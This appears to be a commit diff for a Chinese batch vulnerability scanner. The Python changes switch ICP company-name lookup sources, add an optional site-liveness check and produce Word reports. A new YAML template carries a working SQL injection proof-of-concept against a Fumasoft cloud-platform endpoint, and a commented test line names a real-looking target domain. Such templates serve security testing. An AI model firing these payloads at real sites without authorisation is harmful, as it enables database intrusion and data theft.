更新备案API

new_poc_tools.py

@@ -7,6 +7,7 @@ import urllib.parse
 import sys
 import docx
 import os
+import re
 import warnings
 import requests
 import argparse
@@ -48,11 +49,15 @@ def get_company_name(url):
     soup = BeautifulSoup(response.content, 'html.parser')
     
     # 查找公司名称的<a>标签
-    company_name_tag = soup.find('a', id='companyName')
+    company_name_tag = soup.find('div', {'tag': 'company_name'})
     
     # 提取公司名称
     if company_name_tag:
-        return company_name_tag.text
+        text = company_name_tag.text
+        cleaned_text = re.sub(r'[^\w\s]', '', text)  # 去除英文符号
+        cleaned_text = re.sub(r'\s+', ' ', cleaned_text).strip()  # 去除多余空格和换行符
+        return cleaned_text
+        # return company_name_tag.text
     else:
         print("公司名称未找到")
         return None
@@ -100,9 +105,9 @@ def create_document():
 def extract_root_domain(url):
     extracted = tldextract.extract(url)
     root_domain = f"{extracted.domain}.{extracted.suffix}"
-    encoded_bytes = base64.b64encode(root_domain.encode('utf-8'))
+    # encoded_bytes = base64.b64encode(root_domain.encode('utf-8'))
-    encoded_str = encoded_bytes.decode('utf-8')    
+    # encoded_str = encoded_bytes.decode('utf-8')    
-    return urllib.parse.quote(encoded_str)
+    return urllib.parse.quote(root_domain)
 
 def add_scan_results_to_document(document, domain, results, include_all, description, choice_3):
     for name, result, status_code, url, res_time in results:
@@ -117,7 +122,8 @@ def add_scan_results_to_document(document, domain, results, include_all, descrip
             if result == "存在漏洞" and choice_3 == "y":
                 screenshot_path_1 = screenshot(url)
                 # print(screenshot_path_1)
-                screenshot_path_2 = screenshot("https://icp.chinaz.com/home/info?host=" + extract_root_domain(domain))
+                # 站长工具反爬，该截图已废弃
+                # screenshot_path_2 = screenshot("https://icp.chinaz.com/home/info?host=" + extract_root_domain(domain))
                 # print(screenshot_path_2)
                 #word处理部分
                 #导入模板
@@ -136,33 +142,42 @@ def add_scan_results_to_document(document, domain, results, include_all, descrip
                 run = paragraph.add_run()
                 if screenshot_path_1:
                     run.add_picture(screenshot_path_1, width=Cm(16.52), height=Cm(9.13))	#添加图片
-                run.add_picture(screenshot_path_2, width=Cm(16.52), height=Cm(9.13))	#添加图片
+                # run.add_picture(screenshot_path_2, width=Cm(16.52), height=Cm(9.13))	#添加ICP备案图片，已废弃寻找新方法
                 doc_save_path = './file/result/'
                 if not os.path.exists(doc_save_path):
                     os.mkdir(doc_save_path)
                 #保存word，根据需要自行更改
-                company_name = get_company_name("https://icp.chinaz.com/" + domain)
+                company_name = get_company_name("https://whois.west.cn/icp/" + extract_root_domain(domain))
                 doc_name = str(company_name) + "_" + name + ".docx"
                 doc.save(doc_save_path + doc_name)
 
-def mass_poc_scan(domains, include_all, choice_2, docx_name):
+def mass_poc_scan(domains, include_all, choice_2, docx_name, status):
     document = create_document()
     try:
         for domain in domains:
             logging.info(f"正在扫描域名：{domain}")
-            if not check_url_status(domain):
+            if status == 'y':
-                logging.warning(f"访问失败，跳过当前域名的扫描：{domain}")
+                if not check_url_status(domain):
-                print("--------------------------------------------------")
+                    logging.warning(f"访问失败，跳过当前域名的扫描：{domain}")
-                if choice_2.lower() == 'n':
+                    print("--------------------------------------------------")
-                    document.add_heading(f"目标：{domain} 无法访问！", level=3) # 将标题升级为level=3
+                    if choice_2.lower() == 'y':
-                continue
+                        document.add_heading(f"目标：{domain} 无法访问！", level=3) # 将标题升级为level=3
+                    continue
 
-            try:
+                try:
-                results, description = validate_main(domain)
+                    results, description = validate_main(domain)
-                add_scan_results_to_document(document, domain, results, include_all, description, choice_3)
+                    add_scan_results_to_document(document, domain, results, include_all, description, choice_3)
-            except Exception as e:
+                except Exception as e:
-                logging.error(f"扫描域名 {domain} 时出错：{e}")
+                    logging.error(f"扫描域名 {domain} 时出错：{e}")
-            print("--------------------------------------------------")
+                print("--------------------------------------------------")
+                
+            else:
+                try:
+                    results, description = validate_main(domain)
+                    add_scan_results_to_document(document, domain, results, include_all, description, choice_3)
+                except Exception as e:
+                    logging.error(f"扫描域名 {domain} 时出错：{e}")
+                print("--------------------------------------------------")
     except KeyboardInterrupt:
         print(Fore.RED +'\n检测到Ctrl+C，中断程序。' + Fore.RESET)
     save_document(document, docx_name)
@@ -191,6 +206,7 @@ if __name__ == "__main__":
         file_path = "./urls.txt"
         include_all = False
         choice_3 = 'y'
+        status = 'y'
     else:
         # 交互模式
         choice = input(Fore.BLUE + "请问是否需要输入其他目标文件？(y/n): " + Fore.RESET).lower()
@@ -203,6 +219,8 @@ if __name__ == "__main__":
         print("--------------------------------------------------")
         domains = extract_domains_from_file(file_path)
         
+        status = input(Fore.BLUE + "请问是否需要检查目标网站存活状态？(y/n): " + Fore.RESET).lower()
+        print("--------------------------------------------------")
         choice_2 = input(Fore.BLUE + "请问是否删除无漏洞网站记录？(y/n): " + Fore.RESET).lower()
         include_all = choice_2 != 'y'
         print("--------------------------------------------------")
@@ -212,9 +230,13 @@ if __name__ == "__main__":
     # 执行扫描
     domains = extract_domains_from_file(file_path)
     if args.batch:
-        mass_poc_scan(domains, include_all, choice_3, args.name)
+        mass_poc_scan(domains, include_all, choice_3, args.name, status)
     else:
         docx_name = input(Fore.BLUE + "请输入总报告文件名(回车可跳过生成报告步骤)：" + Fore.RESET)
         print("--------------------------------------------------")
-        mass_poc_scan(domains, include_all, choice_3, docx_name)
+        mass_poc_scan(domains, include_all, choice_3, docx_name, status)
-    
+    
+# if __name__ == "__main__":
+#     domain = 'http://vr.sh-fit.com:9090'
+#     company_name = get_company_name("https://whois.west.cn/icp/" + extract_root_domain(domain))
+#     print(company_name)

poc/OA-Poc/fuma-AjaxSendDingdingMessage-SQL.yaml

@@ -0,0 +1,30 @@
+keyword: fumasoft
+name: 孚盟云平台存在SQL注入漏洞
+description: | # 下一行可填写漏洞描述
+  孚盟云平台AjaxSendDingdingMessage.ashx接口存在SQL注入漏洞。
+requests: # 为空代表默认或者不启用
+  path: "/m/Dingding/Ajax/AjaxSendDingdingMessage.ashx"
+  method: POST
+  headers:
+    Accept: '*/*'
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8
+    Referer: https://www.baidu.com
+    Accept-Encoding: gzip, deflate
+    Connection: keep-alive
+    Content-Type: application/x-www-form-urlencoded
+  body-raw: |- # 如果需要发送请求体，在下一行开始填写
+    action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+
+
+response: 
+  path: "" # 不填则默认接收此请求的响应包
+  status-code: 200
+  body: "Copyright"  # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
+  time:     # 此处填写响应包响应时间，默认不启用
+  headers:
+    Server: 
+    Content-type: 
+    Content-length: 
+    Date: 
+    Connection: 
+impact: | # 下一行可填写漏洞影响
+  孚盟云平台AjaxSendDingdingMessage.ashx接口存在SQL注入漏洞，可能导致数据库敏感信息泄露。